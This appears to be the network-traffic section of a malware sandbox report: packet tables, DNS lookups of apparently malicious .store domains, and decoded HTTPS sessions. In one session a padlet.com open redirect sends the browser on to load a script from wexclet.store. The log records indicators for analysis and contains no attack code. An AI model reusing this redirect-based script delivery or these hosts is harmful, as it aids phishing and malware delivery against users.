Aug 21, 2024 23:18:17.101358891 CEST	49775	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:18:17.101392031 CEST	443	49775	142.250.185.228	192.168.2.4
Aug 21, 2024 23:18:35.974225998 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:18:35.979055882 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:19:18.591618061 CEST	56321	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:19:18.596829891 CEST	53	56321	1.1.1.1	192.168.2.4
Aug 21, 2024 23:19:18.596899033 CEST	56321	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:19:18.597120047 CEST	56321	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:19:18.602283001 CEST	53	56321	1.1.1.1	192.168.2.4
Aug 21, 2024 23:19:19.316095114 CEST	53	56321	1.1.1.1	192.168.2.4
Aug 21, 2024 23:19:19.316606045 CEST	56321	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:19:19.316634893 CEST	53	56321	1.1.1.1	192.168.2.4
Aug 21, 2024 23:19:19.316845894 CEST	56321	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:19:19.322642088 CEST	53	56321	1.1.1.1	192.168.2.4
Aug 21, 2024 23:19:19.322930098 CEST	56321	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:19:20.989795923 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:19:20.994632006 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:20:06.005059958 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:20:06.009968996 CEST	4040	49746	185.174.100.20	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 21, 2024 23:17:00.955687046 CEST	60751	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:00.955821991 CEST	60142	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:00.957248926 CEST	59182	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:00.957400084 CEST	54221	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:00.958328009 CEST	54838	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:00.958494902 CEST	63928	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:00.960865974 CEST	53	55947	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:00.962196112 CEST	53	51678	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:00.963495970 CEST	53	58342	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:00.964617968 CEST	53	59182	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:00.964637995 CEST	53	54221	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:00.964838982 CEST	53	54838	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:00.965970039 CEST	53	60751	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:00.969685078 CEST	53	63928	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:00.975614071 CEST	53	60142	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:01.681696892 CEST	56265	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:01.681786060 CEST	61240	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:01.696348906 CEST	53	56265	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:01.696795940 CEST	53	61240	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:01.860989094 CEST	55381	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:01.861159086 CEST	60752	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:01.867688894 CEST	53	60752	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:01.867779016 CEST	53	55381	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:02.161977053 CEST	53	50487	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:02.187045097 CEST	53	62032	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:02.745527029 CEST	61726	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:02.745887041 CEST	50574	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:02.758687973 CEST	53	50574	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:02.758964062 CEST	53	61726	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:03.622334957 CEST	60426	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:03.623024940 CEST	61403	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:03.638201952 CEST	53077	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:03.639221907 CEST	49709	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:03.639341116 CEST	53	60426	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:03.639353991 CEST	53	61403	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:03.646228075 CEST	53	53077	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:03.646826029 CEST	53	49709	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:05.228974104 CEST	62175	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:05.229872942 CEST	57444	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:05.235584021 CEST	53	62175	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:05.236829042 CEST	53	57444	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:05.261926889 CEST	54076	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:05.262271881 CEST	51932	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:05.269047976 CEST	53	54076	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:05.269718885 CEST	53	51932	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:05.309736013 CEST	51868	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:05.309950113 CEST	49781	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:05.322093010 CEST	53	51868	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:05.332319975 CEST	53	49781	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:06.086065054 CEST	62150	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:06.086718082 CEST	58696	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:06.090132952 CEST	54295	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:06.090734959 CEST	63880	53	192.168.2.4	1.1.1.1
Aug 21, 2024 23:17:06.094079971 CEST	53	62150	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:06.094460011 CEST	53	58696	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:06.098424911 CEST	53	63880	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:06.098581076 CEST	53	54295	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:14.231031895 CEST	53	60905	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:19.638983965 CEST	53	52641	1.1.1.1	192.168.2.4
Aug 21, 2024 23:17:22.495662928 CEST	138	138	192.168.2.4	192.168.2.255
Aug 21, 2024 23:17:38.606982946 CEST	53	54527	1.1.1.1	192.168.2.4
Aug 21, 2024 23:18:00.392884016 CEST	53	64631	1.1.1.1	192.168.2.4
Aug 21, 2024 23:18:01.340321064 CEST	53	59698	1.1.1.1	192.168.2.4
Aug 21, 2024 23:18:28.247440100 CEST	53	59323	1.1.1.1	192.168.2.4
Aug 21, 2024 23:19:14.545942068 CEST	53	64693	1.1.1.1	192.168.2.4
Aug 21, 2024 23:19:18.590847015 CEST	53	50585	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 21, 2024 23:17:00.975681067 CEST	192.168.2.4	1.1.1.1	c233	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 21, 2024 23:17:00.955687046 CEST	192.168.2.4	1.1.1.1	0x6955	Standard query (0)	sopbtech.store	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.955821991 CEST	192.168.2.4	1.1.1.1	0xa224	Standard query (0)	sopbtech.store	65	IN (0x0001)	false
Aug 21, 2024 23:17:00.957248926 CEST	192.168.2.4	1.1.1.1	0x7139	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.957400084 CEST	192.168.2.4	1.1.1.1	0xa90e	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Aug 21, 2024 23:17:00.958328009 CEST	192.168.2.4	1.1.1.1	0xd2e2	Standard query (0)	padlet.com	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.958494902 CEST	192.168.2.4	1.1.1.1	0x1bee	Standard query (0)	padlet.com	65	IN (0x0001)	false
Aug 21, 2024 23:17:01.681696892 CEST	192.168.2.4	1.1.1.1	0x2b1c	Standard query (0)	wexclet.store	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:01.681786060 CEST	192.168.2.4	1.1.1.1	0xf56	Standard query (0)	wexclet.store	65	IN (0x0001)	false
Aug 21, 2024 23:17:01.860989094 CEST	192.168.2.4	1.1.1.1	0x7cc1	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:01.861159086 CEST	192.168.2.4	1.1.1.1	0xe232	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Aug 21, 2024 23:17:02.745527029 CEST	192.168.2.4	1.1.1.1	0x3443	Standard query (0)	wexclet.store	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:02.745887041 CEST	192.168.2.4	1.1.1.1	0xf7d0	Standard query (0)	wexclet.store	65	IN (0x0001)	false
Aug 21, 2024 23:17:03.622334957 CEST	192.168.2.4	1.1.1.1	0x65a1	Standard query (0)	server.povbtech.store	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:03.623024940 CEST	192.168.2.4	1.1.1.1	0x65a0	Standard query (0)	_4040._https.server.povbtech.store	65	IN (0x0001)	false
Aug 21, 2024 23:17:03.638201952 CEST	192.168.2.4	1.1.1.1	0xc3ab	Standard query (0)	logo.clearbit.com	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:03.639221907 CEST	192.168.2.4	1.1.1.1	0x2a9b	Standard query (0)	logo.clearbit.com	65	IN (0x0001)	false
Aug 21, 2024 23:17:05.228974104 CEST	192.168.2.4	1.1.1.1	0x3b7a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:05.229872942 CEST	192.168.2.4	1.1.1.1	0x9b6b	Standard query (0)	www.google.com	65	IN (0x0001)	false
Aug 21, 2024 23:17:05.261926889 CEST	192.168.2.4	1.1.1.1	0x7e62	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:05.262271881 CEST	192.168.2.4	1.1.1.1	0x507	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Aug 21, 2024 23:17:05.309736013 CEST	192.168.2.4	1.1.1.1	0xe33	Standard query (0)	sopbtech.store	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:05.309950113 CEST	192.168.2.4	1.1.1.1	0xcae	Standard query (0)	sopbtech.store	65	IN (0x0001)	false
Aug 21, 2024 23:17:06.086065054 CEST	192.168.2.4	1.1.1.1	0x2411	Standard query (0)	logo.clearbit.com	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:06.086718082 CEST	192.168.2.4	1.1.1.1	0x16e2	Standard query (0)	logo.clearbit.com	65	IN (0x0001)	false
Aug 21, 2024 23:17:06.090132952 CEST	192.168.2.4	1.1.1.1	0x11c4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:06.090734959 CEST	192.168.2.4	1.1.1.1	0x9790	Standard query (0)	api.ipify.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 21, 2024 23:17:00.964617968 CEST	1.1.1.1	192.168.2.4	0x7139	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.964617968 CEST	1.1.1.1	192.168.2.4	0x7139	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.964617968 CEST	1.1.1.1	192.168.2.4	0x7139	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.964617968 CEST	1.1.1.1	192.168.2.4	0x7139	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.964838982 CEST	1.1.1.1	192.168.2.4	0xd2e2	No error (0)	padlet.com		104.18.42.238	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.964838982 CEST	1.1.1.1	192.168.2.4	0xd2e2	No error (0)	padlet.com		172.64.145.18	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.965970039 CEST	1.1.1.1	192.168.2.4	0x6955	No error (0)	sopbtech.store		199.188.200.183	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:00.969685078 CEST	1.1.1.1	192.168.2.4	0x1bee	No error (0)	padlet.com			65	IN (0x0001)	false
Aug 21, 2024 23:17:01.696348906 CEST	1.1.1.1	192.168.2.4	0x2b1c	No error (0)	wexclet.store		162.0.215.17	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:01.867779016 CEST	1.1.1.1	192.168.2.4	0x7cc1	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:01.867779016 CEST	1.1.1.1	192.168.2.4	0x7cc1	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:01.867779016 CEST	1.1.1.1	192.168.2.4	0x7cc1	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:01.867779016 CEST	1.1.1.1	192.168.2.4	0x7cc1	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:02.758964062 CEST	1.1.1.1	192.168.2.4	0x3443	No error (0)	wexclet.store		162.0.215.17	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:03.639341116 CEST	1.1.1.1	192.168.2.4	0x65a1	No error (0)	server.povbtech.store		185.174.100.20	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:03.639353991 CEST	1.1.1.1	192.168.2.4	0x65a0	Name error (3)	_4040._https.server.povbtech.store	none	none	65	IN (0x0001)	false
Aug 21, 2024 23:17:03.646228075 CEST	1.1.1.1	192.168.2.4	0xc3ab	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 21, 2024 23:17:03.646228075 CEST	1.1.1.1	192.168.2.4	0xc3ab	No error (0)	d26p066pn2w0s0.cloudfront.net		3.165.206.76	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:03.646228075 CEST	1.1.1.1	192.168.2.4	0xc3ab	No error (0)	d26p066pn2w0s0.cloudfront.net		3.165.206.23	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:03.646228075 CEST	1.1.1.1	192.168.2.4	0xc3ab	No error (0)	d26p066pn2w0s0.cloudfront.net		3.165.206.116	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:03.646228075 CEST	1.1.1.1	192.168.2.4	0xc3ab	No error (0)	d26p066pn2w0s0.cloudfront.net		3.165.206.77	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:03.646645069 CEST	1.1.1.1	192.168.2.4	0xd42b	No error (0)	shed.dual-low.s-part-0036.t-0009.t-msedge.net	s-part-0036.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 21, 2024 23:17:03.646645069 CEST	1.1.1.1	192.168.2.4	0xd42b	No error (0)	s-part-0036.t-0009.t-msedge.net		13.107.246.64	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:03.646826029 CEST	1.1.1.1	192.168.2.4	0x2a9b	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 21, 2024 23:17:05.235584021 CEST	1.1.1.1	192.168.2.4	0x3b7a	No error (0)	www.google.com		142.250.185.228	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:05.236829042 CEST	1.1.1.1	192.168.2.4	0x9b6b	No error (0)	www.google.com			65	IN (0x0001)	false
Aug 21, 2024 23:17:05.269047976 CEST	1.1.1.1	192.168.2.4	0x7e62	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:05.269047976 CEST	1.1.1.1	192.168.2.4	0x7e62	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:05.269047976 CEST	1.1.1.1	192.168.2.4	0x7e62	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:05.269718885 CEST	1.1.1.1	192.168.2.4	0x507	No error (0)	api.ipify.org			65	IN (0x0001)	false
Aug 21, 2024 23:17:05.312896967 CEST	1.1.1.1	192.168.2.4	0x246	No error (0)	shed.dual-low.s-part-0014.t-0009.t-msedge.net	s-part-0014.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 21, 2024 23:17:05.312896967 CEST	1.1.1.1	192.168.2.4	0x246	No error (0)	s-part-0014.t-0009.t-msedge.net		13.107.246.42	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:05.322093010 CEST	1.1.1.1	192.168.2.4	0xe33	No error (0)	sopbtech.store		199.188.200.183	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:06.094079971 CEST	1.1.1.1	192.168.2.4	0x2411	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 21, 2024 23:17:06.094079971 CEST	1.1.1.1	192.168.2.4	0x2411	No error (0)	d26p066pn2w0s0.cloudfront.net		13.32.27.14	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:06.094079971 CEST	1.1.1.1	192.168.2.4	0x2411	No error (0)	d26p066pn2w0s0.cloudfront.net		13.32.27.77	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:06.094079971 CEST	1.1.1.1	192.168.2.4	0x2411	No error (0)	d26p066pn2w0s0.cloudfront.net		13.32.27.44	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:06.094079971 CEST	1.1.1.1	192.168.2.4	0x2411	No error (0)	d26p066pn2w0s0.cloudfront.net		13.32.27.129	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:06.094460011 CEST	1.1.1.1	192.168.2.4	0x16e2	No error (0)	logo.clearbit.com	d26p066pn2w0s0.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 21, 2024 23:17:06.098424911 CEST	1.1.1.1	192.168.2.4	0x9790	No error (0)	api.ipify.org			65	IN (0x0001)	false
Aug 21, 2024 23:17:06.098581076 CEST	1.1.1.1	192.168.2.4	0x11c4	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:06.098581076 CEST	1.1.1.1	192.168.2.4	0x11c4	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Aug 21, 2024 23:17:06.098581076 CEST	1.1.1.1	192.168.2.4	0x11c4	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

padlet.com

code.jquery.com

sopbtech.store

wexclet.store

aadcdn.msauth.net

api.ipify.org

logo.clearbit.com

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	104.18.42.238	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:01 UTC	537	OUT	GET /redirect?url=https%3A%2F%2Fwexclet.store%2F0xa937eg29be0xcss.js HTTP/1.1 Host: padlet.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:01 UTC	1278	IN	HTTP/1.1 302 Found Date: Wed, 21 Aug 2024 21:17:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-xss-protection: 0 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none referrer-policy: strict-origin-when-cross-origin ww-app-version: v-2408212017-79e13b-production vary: Accept-Encoding, Accept-Language p3p: CP="IDC DSP COR CURa ADMa OUR NOR ONL COM" ww-qt: low location: https://wexclet.store/0xa937eg29be0xcss.js Cache-Control: no-cache set-cookie: ww_d=2712f5d59c3e1f1685698c815e363d1f; domain=.padlet.com; path=/; expires=Tue, 21 Aug 2074 21:17:01 GMT; secure x-request-id: 488d09e0-c1a5-4c9a-8557-a052e94da3ca x-runtime: 0.037229 strict-transport-security: max-age=63072000; includeSubDomains ww-box: mozart-web-5588d47dc6-tgbzc via: 1.1 google x-backend: GKE-mozart-production alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Set-Cookie: ww_s=36434a5de1de051a8c17bccdbe1bd709; domain=.padlet.com; path=/; expires=Wed, 21 Aug 2024 21:47:01 GMT; secure Set-Cookie: ww_l=; domain=.padlet.com; path=/; expires=Tue, 21 Aug 2074 21:17:01 GMT; secure Set-Cookie: ww_f=beta%3Dfalse; domain=.padlet.com; path=/; expires=Tue, 21 Aug 2074 21:17:01 GMT; secure
2024-08-21 21:17:01 UTC	665	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 58 56 79 4c 5a 42 6c 64 47 46 43 75 59 38 64 43 2e 6d 35 55 4d 6e 61 41 55 61 54 30 35 5a 69 59 32 41 31 36 5a 4a 53 31 36 30 30 2d 31 37 32 34 32 37 35 30 32 31 2d 31 2e 30 2e 31 2e 31 2d 31 41 72 68 69 2e 6e 6d 72 50 4b 50 51 46 37 61 63 31 33 75 7a 36 31 35 74 4e 4b 34 56 76 57 43 50 52 66 68 67 77 53 77 6c 50 56 65 68 34 4e 47 71 57 33 78 48 51 35 57 78 48 61 56 70 74 53 42 4d 55 4d 57 51 34 31 75 72 72 2e 34 74 69 41 73 73 68 57 70 57 43 36 57 6b 38 52 39 66 74 53 69 45 54 46 57 50 50 41 51 68 7a 63 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 31 2d 41 75 67 2d 32 34 20 32 31 3a 34 37 3a 30 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 70 61 64 6c 65 74 2e 63 6f 6d Data Ascii: Set-Cookie: __cf_bm=XVyLZBldGFCuY8dC.m5UMnaAUaT05ZiY2A16ZJS1600-1724275021-1.0.1.1-1Arhi.nmrPKPQF7ac13uz615tNK4VvWCPRfhgwSwlPVeh4NGqW3xHQ5WxHaVptSBMUMWQ41urr.4tiAsshWpWC6Wk8R9ftSiETFWPPAQhzc; path=/; expires=Wed, 21-Aug-24 21:47:01 GMT; domain=.padlet.com
2024-08-21 21:17:01 UTC	114	IN	Data Raw: 36 63 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 78 63 6c 65 74 2e 73 74 6f 72 65 2f 30 78 61 39 33 37 65 67 32 39 62 65 30 78 63 73 73 2e 6a 73 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 6c<html><body>You are being <a href="https://wexclet.store/0xa937eg29be0xcss.js">redirected</a>.</body></html>
2024-08-21 21:17:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	151.101.2.137	443	4180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-21 21:17:01 UTC	498	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-21 21:17:01 UTC	612	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Wed, 21 Aug 2024 21:17:01 GMT Age: 397527 X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740045-EWR X-Cache: HIT, HIT X-Cache-Hits: 2578, 4 X-Timer: S1724275022.610909,VS0,VE0 Vary: Accept-Encoding
2024-08-21 21:17:01 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2024-08-21 21:17:01 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
